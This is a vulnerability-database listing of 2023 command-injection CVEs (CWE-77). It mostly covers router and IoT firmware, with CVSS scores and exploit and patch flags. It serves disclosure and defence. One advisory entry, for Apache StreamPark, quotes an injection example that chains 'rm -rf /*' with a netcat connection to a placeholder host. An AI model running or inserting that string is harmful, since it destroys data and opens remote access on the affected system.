Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-77

CVE ID | Description | CVSS | Vendor | Exploit | Patch
CVE-2023-51887 | Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL. | 9.8 | - | Exploit | -
CVE-2023-51835 | An issue in TRENDnet TEW-822DRE v.1.03B02 allows a local attacker to execute arbitrary code via the parameters ipv4_ping in the /boafrm/formSystemCheck. | 6.8 | Trendnet | - | -
CVE-2023-51833 | A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page. | 8.1 | Trendnet | Exploit | -
CVE-2023-51707 | MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. | 9.8 | Arraynetworks | - | Patched
CVE-2023-51664 | tj-actions/changed-files is a Github action to retrieve all files and directories. Prior to 41.0.0, the `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. This issue may lead to arbitrary command execution in the GitHub Runner. This vulnerability has been addressed in version 41.0.0. Users are advised to upgrade. | 7.3 | Tj-actions | Exploit | Patched
CVE-2023-51126 | Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter. | 9.8 | Flir | Exploit | -
CVE-2023-51025 | TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi.cgi. | 9.8 | Totolink | Exploit | -
CVE-2023-51016 | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi.cgi. | 9.8 | Totolink | Exploit | -
CVE-2023-51014 | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter of the setLanConfig interface of the cstecgi.cgi. | 9.8 | Totolink | Exploit | -
CVE-2023-50989 | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function. | 9.8 | Tenda | Exploit | -
CVE-2023-50983 | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function. | 9.8 | Tenda | Exploit | -
CVE-2023-50917 | MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. | 9.8 | Mjdm | Exploit | Patched
CVE-2023-50447 | Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter). | 8.1 | Tenable, et al | Exploit | Patched
CVE-2023-50445 | Shell Injection vulnerability in GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7 allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module. | 7.8 | Gl-inet | Exploit | -
CVE-2023-50274 | This vulnerability allows local attackers to escalate privileges on affected installations of Hewlett Packard Enterprise OneView. An attacker must first obtain the ability to execute low-privileged code on the target system or send an HTTP request to a local service in order to exploit this vulnerability. The specific flaw exists within the startUpgradeCommon method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Hewlett Packard Enterprise has issued an update to correct this vulnerability. More details can be found at: https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04586en_us&docLocale=en_US | 7.8 | Hp | Exploit | Patched
CVE-2023-50089 | A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. | 9.8 | Netgear | Exploit | Patched
CVE-2023-49959 | In Indo-Sol PROFINET-INspektor NT through 2.4.0, a command injection vulnerability in the gedtupdater service of the firmware allows remote attackers to execute arbitrary system commands with root privileges via a crafted filename parameter in POST requests to the /api/updater/ctrl/start_update endpoint. | 9.8 | - | - | -
CVE-2023-49898 | In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & | 7.2 | Apache | - | Patched
CVE-2023-49716 | In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an authenticated user with network access could run arbitrary commands from a remote computer. | 9.8 | Emerson | - | Patched
CVE-2023-49587 | SAP Solution Manager - version 720, allows an authorized attacker to execute certain deprecated function modules which can read or modify data of same or other component without user interaction over the network. | 6.4 | Sap | - | Patched
CVE-2023-4958 | In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user's account permissions to perform other actions. | 6.1 | Redhat | - | Patched
CVE-2023-49437 | Tenda AX12 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'list' parameter at /goform/SetNetControlList. | 9.8 | Tenda | Exploit | -
CVE-2023-49436 | Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'list' parameter at /goform/SetNetControlList. | 9.8 | Tenda | Exploit | -
CVE-2023-49435 | Tenda AX9 V22.03.01.46 is vulnerable to command injection. | 9.8 | Tenda | Exploit | -
CVE-2023-49431 | Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName. | 9.8 | Tenda | Exploit | -
CVE-2023-49428 | Tenda AX12 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName. | 9.8 | Tenda | Exploit | -
CVE-2023-49237 | An issue was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Command injection can occur because the system function is used by davinci to unpack language packs without strict filtering of URL strings. | 9.8 | Trendnet | Exploit | Patched
CVE-2023-49226 | An issue was discovered in Peplink Balance Two before 8.4.0. Command injection in the traceroute feature of the administration console allows users with admin privileges to execute arbitrary commands as root. | 7.2 | Peplink | Exploit | -
CVE-2023-49213 | The API endpoints in Ironman PowerShell Universal 3.0.0 through 4.2.0 allow remote attackers to execute arbitrary commands via crafted HTTP requests if a param block is used, due to invalid sanitization of input strings. The fixed versions are 3.10.2, 4.1.10, and 4.2.1. | 8.8 | Ironmansoftware | Exploit | Patched
CVE-2023-49210 | The openssl (aka node-openssl) NPM package through 2.0.0 was characterized as "a nonsense wrapper with no real purpose" by its author, and accepts an opts argument that contains a verb field (used for command execution). NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | 9.8 | Node-openssl project | Exploit | Patched
CVE-2023-49040 | An issue in Tenda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the adslPwd parameter in the form_fast_setting_internet_set function. | 9.8 | Tenda | Exploit | -
CVE-2023-48842 | D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi. | 9.8 | Dlink | Exploit | -
CVE-2023-48801 | In TOTOLINK X6000R_Firmware V9.4.0cu.852_B20230719, the shttpd file sub_415534 function obtains fields from the front-end, connects them through the snprintf function, and passes them to the CsteSystem function, resulting in a command execution vulnerability. | 9.8 | Totolink | Exploit | -
CVE-2023-48791 | An improper neutralization of special elements used in a command ('Command Injection') vulnerability [CWE-77] in FortiPortal version 7.2.0, version 7.0.6 and below may allow a remote authenticated attacker with at least R/W permission to execute unauthorized commands via specifically crafted arguments in the Schedule System Backup page field. | 8.8 | Fortinet | - | Patched
CVE-2023-48702 | Jellyfin is a system for managing and streaming media. Prior to version 10.8.13, the `/System/MediaEncoder/Path` endpoint executes an arbitrary file using `ProcessStartInfo` via the `ValidateVersion` function. A malicious administrator can setup a network share and supply a UNC path to `/System/MediaEncoder/Path` which points to an executable on the network share, causing Jellyfin server to run the executable in the local context. The endpoint was removed in version 10.8.13. | 7.2 | Jellyfin | Exploit | Patched
CVE-2023-4797 | The Newsletters WordPress plugin before 4.9.3 does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server. | 7.2 | Tribulant | Exploit | -
CVE-2023-47576 | An issue was discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface. | 8.8 | Relyum | - | Patched
CVE-2023-47563 | An OS command injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: Video Station 5.8.2 and later | 8.8 | Synology, et al | - | Patched
CVE-2023-47562 | An OS command injection vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: Photo Station 6.4.2 ( 2023/12/15 ) and later | 8.8 | Qnap | - | Patched
CVE-2023-47560 | An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later | 8.8 | Qnap | - | Patched
CVE-2023-47253 | Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter. | 9.8 | - | Exploit | -
CVE-2023-47218 | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later; QuTS hero h5.1.5.2647 build 20240118 and later; QuTScloud c5.1.5.2651 and later | 5.8 | Qnap | Exploit | -
CVE-2023-47104 | tinyfiledialogs (aka tiny file dialogs) before 3.15.0 allows shell metacharacters (such as a backquote or a dollar sign) in titles, messages, and other input data. NOTE: this issue exists because of an incomplete fix for CVE-2020-36767, which only considered single and double quote characters. | 9.8 | Vareille | Exploit | Patched
CVE-2023-46993 | In TOTOLINK A3300R V17.0.0cu.557_B20221024 when dealing with setLedCfg request, there is no verification for the enable parameter, which can lead to command injection. | 9.8 | Totolink | Exploit | -
CVE-2023-46979 | TOTOLINK X6000R V9.4.0cu.852_B20230719 was discovered to contain a command injection vulnerability via the enable parameter in the setLedCfg function. | 9.8 | Totolink | Exploit | -
CVE-2023-46976 | TOTOLINK A3300R 17.0.0cu.557_B20221024 contains a command injection via the file_name parameter in the UploadFirmwareFile function. | 9.8 | Totolink | Exploit | -
CVE-2023-46687 | In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could execute arbitrary commands in root context from a remote computer. | 9.8 | Emerson | - | Patched
CVE-2023-46574 | An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function. | 9.8 | Totolink | Exploit | -
CVE-2023-46485 | An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component. | 9.8 | Totolink | Exploit | -
CVE-2023-46484 | An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function. | 9.8 | Totolink | Exploit | -
CVE-2023-46424 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_422BD4 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46423 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_417094 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46422 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_411994 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46421 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_411D00 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46420 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_41590C function. | 9.8 | Totolink | Exploit | -
CVE-2023-46419 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_415730 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46418 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_412688 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46417 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_415498 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46416 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_41A414 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46415 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_41E588 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46414 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_41D494 function. | 9.8 | Totolink | Exploit | -
CVE-2023-46413 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_4155DC function. | 9.8 | - | Exploit | -
CVE-2023-46412 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_41D998 function. | 9.8 | - | Exploit | -
CVE-2023-46411 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_415258 function. | 9.8 | - | Exploit | -
CVE-2023-46410 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_416F60 function. | 9.8 | - | Exploit | -
CVE-2023-46409 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_41CC04 function. | 9.8 | - | Exploit | -
CVE-2023-46408 | TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_41DD80 function. | 9.8 | - | Exploit | -
CVE-2023-46370 | Tenda W18E V16.01.0.8(1576) has a command injection vulnerability via the hostName parameter in the formSetNetCheckTools function. | 9.8 | - | Exploit | -
CVE-2023-45852 | In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method. | 9.8 | - | Exploit | -
CVE-2023-45625 | Multiple authenticated command injection vulnerabilities exist in the command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system. | 7.2 | Arubanetworks, et al | - | Patched
CVE-2023-45498 | VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain a command injection vulnerability. | 9.8 | Vinchin | Exploit | -
CVE-2023-45466 | Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the pin_host parameter in the WPS Settings. | 9.8 | - | Exploit | -
CVE-2023-45465 | Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the ddnsDomainName parameter in the Dynamic DNS settings. | 9.8 | - | Exploit | -
CVE-2023-45356 | Atos Unify OpenScape 4000 Platform V10 R1 before Hotfix V10 R1.42.2 4000 and Manager Platform V10 R1 before Hotfix V10 R1.42.2 allow command injection by an authenticated attacker into the platform operating system, leading to administrative access, via dtb pages of the platform portal. This is also known as OSFOURK-23719. | 8.8 | Atos | - | Patched
CVE-2023-45355 | Atos Unify OpenScape 4000 Platform V10 R1 before Hotfix V10 R1.42.2 and 4000 and Manager Platform V10 R1 before Hotfix V10 R1.42.2 allow command injection by an authenticated attacker into the platform operating system, leading to administrative access via the webservice. This is also known as OSFOURK-24120. | 8.8 | Atos | - | Patched
CVE-2023-45351 | Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.1, 4000 Assistant V10 R0, 4000 Manager V10 R1 before V10 R1.42.1, and 4000 Manager V10 R0 allow Authenticated Command Injection via AShbr. This is also known as OSFOURK-24039. | 8.8 | Atos | - | Patched
CVE-2023-45208 | A command injection in the parsing_xml_stasurvey function inside libcgifunc.so of the D-Link DAP-X1860 repeater 1.00 through 1.01b05-01 allows attackers (within range of the repeater) to run shell commands as root during the setup process of the repeater, via a crafted SSID. Also, network names containing single quotes (in the range of the repeater) can result in a denial of service. | 8.8 | - | Exploit | -
CVE-2023-45025 | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later; QTS 4.5.4.2627 build 20231225 and later; QuTS hero h5.1.4.2596 build 20231128 and later; QuTS hero h4.5.4.2626 build 20231225 and later; QuTScloud c5.1.5.2651 and later | 9.8 | Qnap | - | Patched
CVE-2023-44959 | An issue found in D-Link DSL-3782 v.1.03 and before allows remote authenticated users to execute arbitrary code as root via the Router IP Address fields of the network settings page. | 8.8 | Dlink | Exploit | -
CVE-2023-44827 | An issue in ZenTao Community Edition v.18.6 and before, ZenTao Biz v.8.6 and before, ZenTao Max v.4.7 and before allows an attacker to execute arbitrary code via a crafted script to the Office Conversion Settings function. | 8.8 | Easycorp | Exploit | -
CVE-2023-4414 | A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230807. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237517 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 9.8 | Byzoro | Exploit | -
CVE-2023-4401 | Dell SmartFabric Storage Software v1.4 (and earlier) contains an OS Command Injection Vulnerability in the CLI use of the ‘more’ command. A local or remote authenticated attacker could potentially exploit this vulnerability, leading to the ability to gain root-level access. | 8.8 | Dell | - | Patched
CVE-2023-43891 | Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability in the Changing Username and Password function. This vulnerability is exploited via a crafted payload. | 9.8 | - | Exploit | -
CVE-2023-43510 | A vulnerability in the ClearPass Policy Manager web-based management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a non-privileged user on the underlying operating system leading to partial system compromise. | 6.3 | Arubanetworks | - | Patched
CVE-2023-43477 | The ping_from parameter of ping_tracerte.cgi in the web UI of Telstra Smart Modem Gen 2 (Arcadyan LH1000), firmware versions < 0.18.15r, was not properly sanitized before being used in a system call, which could allow an authenticated attacker to achieve command injection as root on the device. | 8.8 | - | Exploit | -
CVE-2023-43455 | An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the command parameter of the setting/setTracerouteCfg component. | 9.8 | Totolink | Exploit | -
CVE-2023-43454 | An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the hostName parameter of the switchOpMode component. | 9.8 | Totolink | Exploit | -
CVE-2023-43453 | An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the IP parameter of the setDiagnosisCfg component. | 9.8 | Totolink | Exploit | -
CVE-2023-43322 | ZPE Systems, Inc Nodegrid OS v5.0.0 to v5.0.17, v5.2.0 to v5.2.19, v5.4.0 to v5.4.16, v5.6.0 to v5.6.13, v5.8.0 to v5.8.10, and v5.10.0 to v5.10.3 was discovered to contain a command injection vulnerability via the endpoint /v1/system/toolkit/files/. | 8.8 | Zpesystems | - | Patched
CVE-2023-43207 | D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function config_upload_handler. This vulnerability allows attackers to execute arbitrary commands via the configRestore parameter. | 9.8 | Dlink | Exploit | -
CVE-2023-43206 | D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function web_cert_download_handler. This vulnerability allows attackers to execute arbitrary commands via the certDownload parameter. | 9.8 | Dlink | Exploit | -
CVE-2023-43204 | D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function sub_2EF50. This vulnerability allows attackers to execute arbitrary commands via the manual-time-string parameter. | 9.8 | Dlink | Exploit | -
CVE-2023-43202 | D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function pcap_download_handler. This vulnerability allows attackers to execute arbitrary commands via the update.device.packet-capture.tftp-file-name parameter. | 9.8 | Dlink | Exploit | -
CVE-2023-43138 | TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds NAPT rules after authentication, and the rule name has an injection point. | 8.8 | - | Exploit | -
CVE-2023-43137 | TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds ACL rules after authentication, and the rule name parameter has injection points. | 8.8 | - | Exploit | -
CVE-2023-43128 | D-LINK DIR-806 1200M11AC wireless router DIR806A1_FW100CNb11 is vulnerable to command injection due to lax filtering of HTTP_ST parameters. | 9.8 | - | Exploit | -
CVE-2023-4310 | BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) versions 23.2.1 and 23.2.2 contain a command injection vulnerability which can be exploited through a malicious HTTP request. Successful exploitation of this vulnerability can allow an unauthenticated remote attacker to execute underlying operating system commands within the context of the site user. This issue is fixed in version 23.2.3. | 9.8 | Beyondtrust | - | Patched
CVE-2023-42810 | systeminformation is a System Information Library for Node.JS. Versions 5.0.0 through 5.21.6 have a SSID Command Injection Vulnerability. The problem was fixed with a parameter check in version 5.21.7. As a workaround, check or sanitize parameter strings that are passed to `wifiConnections()`, `wifiNetworks()` (string only). | 9.8 | Systeminformation | - | Patched
CVE-2023-42326 | An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components. | 8.8 | Netgate | - | Patched
CVE-2023-42136 | PAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow the execution of arbitrary commands with system account privilege by shell injection starting with a specific word. The attacker must have shell access to the device in order to exploit this vulnerability. | 7.8 | Paxtechnology | Exploit | -